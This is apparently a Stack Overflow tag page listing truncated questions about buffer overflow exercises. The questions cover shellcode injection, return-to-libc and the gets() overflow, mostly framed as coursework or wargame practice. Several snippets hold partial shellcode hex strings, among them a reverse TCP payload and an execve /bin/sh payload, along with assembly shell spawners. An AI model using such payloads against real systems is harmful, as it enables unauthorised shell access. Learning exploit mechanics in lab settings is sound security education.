Tagged Questions
1
vote
2answers
71 views
Difficulties injecting shellcode with buffer overflow
For an assignment I am doing, I must inject shellcode to execute execve(/bin/bash) into the following C program:
#include <stdio.h>
#include <string.h>
void return_input(void)
{
char ...
0
votes
1answer
67 views
Illegal Instruction when trying to get shell from a simple stackoverflow
I'm trying to exploit the stack overflow vulnerability to get a shell. When i tried to run it, It shows illegal hardware instruction after executing the shellcode instead of giving a shell(error ...
0
votes
2answers
86 views
shellcode buffer overflow -SegFault
I'm trying to run this shellcode but I keep getting segmentation fault
/* call_shellcode.c */
/*A program that creates a file containing code for launching shell*/
#include <stdlib.h>
#include ...
0
votes
0answers
49 views
ASM shell spawner works, but fails in buffer overflow implementation
I have my assembly code:
section .shellcode progbits alloc exec write align=16
global _start
_start:
xor rdx,rdx
xor rbx,rbx
xor rax,rax
xor rsi,rsi
xor rdi,rdi
mov qword rbx,0x68732f6e69622f2f
...
0
votes
1answer
60 views
BOF with non exec stack
I'm try to pass the level 2 of this "game" http://smashthestack.org/faq.html (connect via ssh on the blackbox server) that consist of a basic buffer overflow.
In the directory /home/level2 (there ...
1
vote
1answer
303 views
A buffer overflow exercise using a shellcode
I have doing an exercise about a buffer overload on a C program, the goal of this problem is to get the root shell once I have inserted a shellcode into the program. This is what I have until now:
...
1
vote
1answer
134 views
Buffer overflow change return address C - without main
How can I get the eip register to point to memory address to execute my shellcode in the following program using buffer overflow?
static int __init onload(void)
{
void function1(char *arg1)
{...
-1
votes
2answers
86 views
(radare2, shellcode) int 0x80 jumping to invalid address
I'm executing a 32bit program (my arch is 64bit).
Vulnerable code:
#include <string.h>
#include <stdio.h>
void main(int argc, char *argv[]) {
copier(argv[1]);
printf("Done!\n");
}
...
0
votes
0answers
49 views
buffer overflow task, cannot run shellcode
I have been struggling for 1 week and cannot figure this out. Please help.
My friend gave me an executable which is just a simple server and has buffer overflow vulnerability. My goal is to get a ...
1
vote
1answer
95 views
Shellcode not executed properly
I am trying to solve Protostar stack5.
Here is a solution.
It puts the shellcode after the return address, I tried to put it before, in the array.
I have tried the shellcode, it works.
It seems ...
1
vote
2answers
157 views
return to libc attack using a function pointer
How should I format my input for the return to libc attack in the following code:
void example_function(int x, const char *name)
{
void (*foo)(int, const char *) = http_serve_none;
char buf[...
1
vote
0answers
218 views
Why reverse_tcp Shellcode doesn't work?
I am using this shellcode:
\x6a\x66\x58\x6a\x01\x5b\x31\xd2\x52\x53\x6a\x02\x89\xe1\xcd\x80\x92\xb0\x66\x68\xc0\xa8\x0f\x81\x66\x68\x05\x39\x43\x66\x53\x89\xe1\x6a\x10\x51\x52\x89\xe1\x43\xcd\x80\...
0
votes
1answer
131 views
Buffer overflow success only when using gdb
If I modify return address directly with GDB, buffer overflow success and I can get shell. However when I don't use GDB, I can't get shell with same shell code. I can't find any difference between ...
2
votes
0answers
131 views
Buffer overflow attack with shell code
I used this shell code for buffer overflow attack
$(python -c 'print "\x48\x31\xff\x57\x57\x5e\x5a\x48\xbf\x2f\x62\x69\x6e\x2f\x73\x68\x57\x54\x5f\x6a\x3b\x58\x0f\x05\xc3"+"a"*31+"\x90\xe4\xff\xff\...
2
votes
0answers
124 views
Shellcode Segfault - testcase vs strcpy
So after taking a Software Security class I became very interested in tinkering with how shellcode works with buffer overflows. Most threads I read about the topic involve having the shellcode as a ...
0
votes
1answer
133 views
reverse move in stack without jmp
Update: Since I'm able to get the correct address into a register that I want to jump/call to, I think the best option would be to figure out a way to have self modifying code result in a jmp/call ...
0
votes
0answers
152 views
Shellcode Without null bytes
I am trying to convert an assembly program into null-free shellcode.
However, I am unsure how to go about this for certain instructions. Some of them way more complex than the examples I found in the ...
1
vote
1answer
159 views
Can't Reproduce Buffer Overflow Without GDB
I have been trying to troubleshoot this problem for a while. I have checked a few StackOverflow links with similar problems, but none of the fixes seemed to work for me. For some reason, instead of ...
0
votes
1answer
1k views
What is the size of a return address?
I know that this might sound a bit noobish, but I cant find this anywhere.
On a 64 bit machine, how many bytes is a return address? What about 32 bit?
The reason I am asking is because I am learning ...
-2
votes
1answer
241 views
Aleph one code - buffer overflow [closed]
I got this code of aleph one:
shellcode.h
#if defined(__i386__) && defined(__linux__)
#define NOP_SIZE 1
char nop[] = "\x90";
char shellcode[] =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\...
1
vote
1answer
858 views
Can you explain the method of finding the offset of a buffer when looking for buffer overflow potential
I'm looking at aleph's article on phrack magazine. The code below can also be found there.
We have a vulnerable executable which it's code is:
vulnerable.c
void main(int argc, char *argv[]) {
...
0
votes
2answers
491 views
buffer overflow exploit change function call
I am trying to perform a buffer overflow to change the call from function A to function B. Is this do-able? I know I will have to figure out how many bytes I have to enter until I have control over ...
0
votes
2answers
681 views
Exploit Development - Shellcode Doesn't Work?
I am following corelan.be/index.php/2009/07/19/exploit-writing-tutorial-part-1-stack-based-overflows/ to reproduce the exploit.
Firstly, I found the position of EIP was after the 26089 As (at ...
0
votes
1answer
244 views
get segmentation fault when executing shellcode
I 'm trying to execute program with shell code injected into stack (program getting from securityTube.net tutorial , Megaprimer buffer overflow ) very good site (http://www.securitytube.net/)
Our ...
0
votes
0answers
355 views
Issue with assembly when trying to spawn shell
I am working on a buffer overflow in C trying to get a shell to spawn. I have had little to no success in doing this. The closest I have gotten to accomplishing this was a segment fault when I believe ...
1
vote
1answer
331 views
“Simple” buffer overflow in Windows 8
I'm trying to create two simple programs in C to simulate a buffer overflow:
first one accepts an input and copies it to the memmory
second one
abuses the first one to execute some shellcode that ...
0
votes
2answers
588 views
Call function in buffer overflow
I'm learning about buffer overflows and found a challenge that has a program somewhat like this:
int main() {
do_something()
return 0;
}
void do_something() {
//get inputs
printf("...
0
votes
1answer
178 views
Findout address of shellcode dynamically, placed on stack
I am using shellcode to spawn a shell,I am curious to findout the starting address of shellcode dynamically,which is placed on stack and not hard code the address in the shellcode
kindly share your ...
0
votes
1answer
544 views
About buffer overflow shellcode position
Im learning exploit. In all BOF examples, the shellcode is always placed in the buffer => shellcode + padding + overwrite return addr. Is it possible to place the shellcode after the return address ...
2
votes
0answers
355 views
Why is eip not being overwritten with the shellcode I am overflowing with?
So I am having to do a buffer overflow for an assignment and I feel like I am very close. I must note that my teacher has set up a VM for us to use in which if we are able to get shellcode into the ...
3
votes
1answer
459 views
Write buffer overflow exploit — how to figure out the address of the shellcode?
When writing buffer overflow exploit, I understand that I'll need to input an array of length (address_of_return_address - address_of_buffer). And the array needs to be filled with the address of the ...
0
votes
1answer
125 views
BufferOverflow shell not spawn
I'm trying a buffer overflow on a simple program
#include <stdio.h>
int main(int argc, char **argv)
{
char buf[8];
gets(buf);
printf("%s\n", buf);
return 0;
}
...
0
votes
1answer
506 views
Solution to stack5.c (buffer stack overflow EIP) on x64
I am following the totorials provided on the following links to learn how to insert shell code through a buffer overflow and redirecting your EIP/RIP towards properly crafted shell code to print you ...
-3
votes
2answers
67 views
accessing a function that is defined after main
I have a C source file that I'm not allowed to change and it is defined as follows:
int main(int argc, char *argv[])
{
//doing something
return 0
}
void __magic()
{
__asm__("jmp %esp");
}...
0
votes
1answer
424 views
shellcode spawning a shell
I have my assembly code to spawn a shell
global _start
section .text
_start:
xor eax, eax
push eax
push 0x68732f6e
push 0x69622f2f
mov ebx, esp
push eax
mov edx, esp
...
1
vote
2answers
334 views
segmentation fault while running shellcode
I am experimenting with shellcode before digging deep into it so I came across an example from the shellcoders handbook. The example is the following:
char shellcode[] = "\xeb\x1a\x5e\x31\xc0\x88\...
1
vote
1answer
514 views
Inject Shellcode - program running and need to inject hexcode from maybe python
So I have a vulnerable program which is to be exploited using buffer overflow. After analysis I have all the relevant values(buffer size, the address to be injected ,etc )
The issue is that I need to ...
2
votes
0answers
747 views
How to buffer overflow the 'gets' method in Ruby?
I wrote a client that gets input from the keyboard and stores it in a variable, like so:
x = gets
In C, normally memory is allocated for standard input and thus I can easily overflow the buffer and ...
-1
votes
1answer
137 views
need to detect any possible buffer overflows
hi guys i need some help with this code. i want to know if there is any buffer overflow in this code. basically this is an exercise for my university. we need to exploit it to open a shell. until now ...
1
vote
0answers
472 views
Why do I still get stack cookie exception although I disabled /GS flag in VS11 when compiling? Scenario: buffer overflow tutorial test
recently I have tried to test a tutorial application on demonstrating buffer overflows, written in C. I used the Visual Studio 2012 toolchain to compile and link the sources, and made sure the ...
0
votes
1answer
103 views
How to insert complex input in gdb dynamically
I need to insert shellcode and its address, but I can detect the address of the buffer only after I run the program in gdb.
The input is complex. If I knew the address, I would run the program like ...
0
votes
1answer
313 views
problems with a ret2eax
I had some problem in trying to overwrite the saved return address. Here is my code :
1 #include <stdio.h>
2 #include <string.h>
3
4 void foo(char *source)
5 {
6 char buf[...
0
votes
1answer
278 views
Runs in gdb but not out of gdb
I am trying to spawn a shell with some shellcode. The payload is in the program itself, however, when I run then program individually I get a segmentation fault, but when running in gdb, my shell ...
2
votes
1answer
969 views
Cannot access return address on x86-32
I am trying my luck with buffer overflows, however, I am stuck at one point. I overwrite the return address, so that EIP will point into the address of the nop sled of my shellcode. However, when ret ...
4
votes
2answers
5k views
Treat input as hex values
I am trying to learn how to create shellcode and I need to input a whole bunch of hex codes. However, when I give give my program an input with hex codes, the hex codes are treated as normal ASCII ...
8
votes
2answers
9k views
Simple buffer overflow and shellcode example
I've been trying to run Aleph One's example in order to get a BOF and open a shell.
This is Aleph One paper: http://insecure.org/stf/smashstack.html
And this is the simple C code (located nearly at ...
0
votes
1answer
289 views
My payload for buffer overflow seems to be not working
I am trying a buffer overflow on the following program:
#include <stdio.h>
#include <stdlib.h>
extern char **environ;
main(int argc, char *argv[]){
char buffer[40];
int i;
if(...
0
votes
0answers
119 views
locating null bytes in shellcode
I have injected my exit syscall shellcode
bb 14 00 00 00
b8 01 00 00 00
cd 80
inspite of having null bytes it works.I don't know why.
On the other hand,when I try to execute a execve ...
0
votes
1answer
1k views
buffer overflow exploit example from “Hacking: The Art of Exploitation”
I've found a few related posts about this on the site but non of them explained my problem.
The code is described here:
Link
My issue is the following:
The author tries to rewrite the return address ...
5
votes
4answers
13k views
Using buffer overflow to execute shell code
I've been learning computer security lately and come across a couple problems, and i'm having some trouble with this one in particular.
I'm given a function with a fixed buffer I need to overflow in ...
